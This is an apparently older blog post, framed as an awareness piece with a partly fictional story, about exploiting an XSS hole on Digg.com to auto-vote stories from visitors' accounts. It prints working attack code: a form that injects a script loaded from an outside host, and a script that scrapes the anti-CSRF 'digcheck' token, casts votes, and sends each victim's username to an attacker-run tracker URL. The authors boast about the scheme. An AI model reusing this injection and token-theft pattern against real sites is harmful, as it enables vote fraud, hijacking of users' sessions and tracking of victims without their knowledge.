Members AreaDisclaimer: This post was written to raise awareness about the importance of protecting your sites against this kind of attacks. Even though all the technical stuff (including the XSS!) is real, the actual story of what we supposedly did is not — We just wanted to spice things up a bit. Keep in mind that Digg is one of the most visited sites in the world and they must have a whole team of experts dedicated to protect themselves to this kind of stuff, don’t they? 
Almost a year and a half ago we learned about an undisclosed XSS hole in Digg.com thanks to Beni. He is an outstanding security researcher and author of pretty sick stuff like this Digg, Delicious, Netscape and Technorati XSS Worm.
The actual XSS hole is this:
Removed after a long talk with my crew because there is the *possibility* that the XSS vector could be used as an SQL Injection too.
For those who aren’t tech savvy enough, we are going to try to explain everything so you can get a grasp about the importance of this kind of holes.
XSS is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other user. This type of vulnerabilities are useful to overcome the same origin policy that is implemented in all modern browsers. In a nutshell, this policy permits scripts running on pages originating from the same site to access the content with no specific restrictions — but prevents access to the content across pages on different sites.
For example, if we access http://asd.com and a script is executed, that script will be able to access f http://asd.com/*.html. However, it won’t be able to read anything located at http://jkl.com or even at http://subdomain.asd.com.
Now let’s examine Digg’s architecture, starting with their voting button:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | <form action="/digremote" id="f1" name="f1" method="post" target="_top">
<input type="hidden" name="digcheck" value="00000000000000000000000000000000" />
<input type="hidden" name="id" value="10797160" />
...
<li class="digg-it" id="diglink1"><a href="#" onclick="document.getElementById('f1').submit(); return false" target="_top">digg it</a></li>
...
</form>
...
<script type="text/javascript">var s_account = "diggcomsyndication";</script>
<script src="http://media.digg.com/js/loader/261/omnidiggthis" type="text/javascript"></script>
<script type="text/javascript"><!--
s.pageName = 'diggthis:digg';
s.prop9 = 'diggthis:default';
s.prop24 = 'diggthis::comedy';
s.prop29 = 'news';
s.prop4 = '00000000000000000000000000000000';
s.prop21 = 'diggthis';
s.prop22 = 'diggthis:';
s.prop23 = 'diggthis::comedy';
s.hier1 = 'diggthis,,comedy';
s.prop14 = 'diggthis:default';
s.prop8 = 'logged-in';
s.channel = 'digg.com';
var s_code=s.t();
if (s_code) document.write(s_code);
//--></script>
... |
The code above will generate a button similar to this one:
In order to prevent a CSRF attack to autovote stories, Digg implemented the digcheck value. If you are a mean webmaster and you want to autovote your story from your visitors accounts without their knowledge, you would need to obtain the digcheck value and the Digg cookie of each visitor. There are various ways of obtaining those two bits of information, but in this case we are going to use the XSS vulnerability.
The best way of learning is doing-it-yourself, so open up the Firebug console while browsing Digg (make sure you are logged in) and execute the following script:
1 2 3 4 | c = document.cookie;
l = 'loginn';
u = c.substr(c.indexOf(l)+10,c.indexOf(';',c.indexOf(l))-c.indexOf(l)-10);
alert(u); |
You will see your username in an alert box since you are running the script inside Digg.com. You can achieve the same effect using the XSS, or you could use it to do something more interesting like autovoting.
Our “setup” for autovoting can be explained with this diagram:
The exploit is pretty straight forward, and it consists of two files. The first file sends a POST request to the vulnerable page to inject a script:
1 2 3 4 5 6 7 8 9 10 11 | <form action="post.php" method="post">
<div><input type="submit" /></div>
</form>
<script type="text/javascript">
<!--
with (document.forms[0]) {
action="http://digg.com/vulnerablepage?vulnerablevariable=<script src=http%3A%2F%2Fhost.tdl%2Fautovote.js>";
submit();
}
-->
</script> |
The second file is the actual script that autovotes the post in the “money” site:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | var url = 'http://digg.com/comedy/7_Items_You_Won_t_Believe_Are_Actually_Legal';
new Ajax.Request(url,
{
method:'post',
onSuccess:function(t) {
t = t.responseText;
a = 'javascript:dig(';
if (t.indexOf(a) > 0) {
i = t.indexOf('s.prop18 = \'')+12;
i = t.substr(i,t.indexOf('\'',i)-i);
a = t.substr(t.indexOf(',',t.indexOf(',',t.indexOf(a)+a.length)+1)+2,32);
p = 'id='+i+'&row=5&digcheck='+a+'&type=s&loc=other';
new Ajax.Request('http://digg.com/diginfull', {
method:'post',
parameters:p,
onSuccess:function(t) {
new Ajax.Request(url, {
method:'post',
onSuccess:function(t) {
if (t.responseText.indexOf('dugg') > 0) {
c = document.cookie;
l = 'loginn';
u = c.substr(c.indexOf(l)+10,c.indexOf(';',c.indexOf(l))-c.indexOf(l)-10);
var s = 'http://host.tdl/tracker.php?user='+u;
document.body.innerHTML+='<img src="'+s+'" />';
}
}
});
}
});
}
}
}); |
Of course we couldn’t leave it like this, so we took things down a step further and we implemented a lot of more goodies. One of them was this neat css history hack thingy, to check if the visitor actually came from Digg. Another thing we implemented, the cherry on the pie, is this:
We had a mother fucker robot that informed us anytime someone Digged one of our stories. Yes, a freakin’ XSS exploit communicating with us via tweets.
We rule so bad.
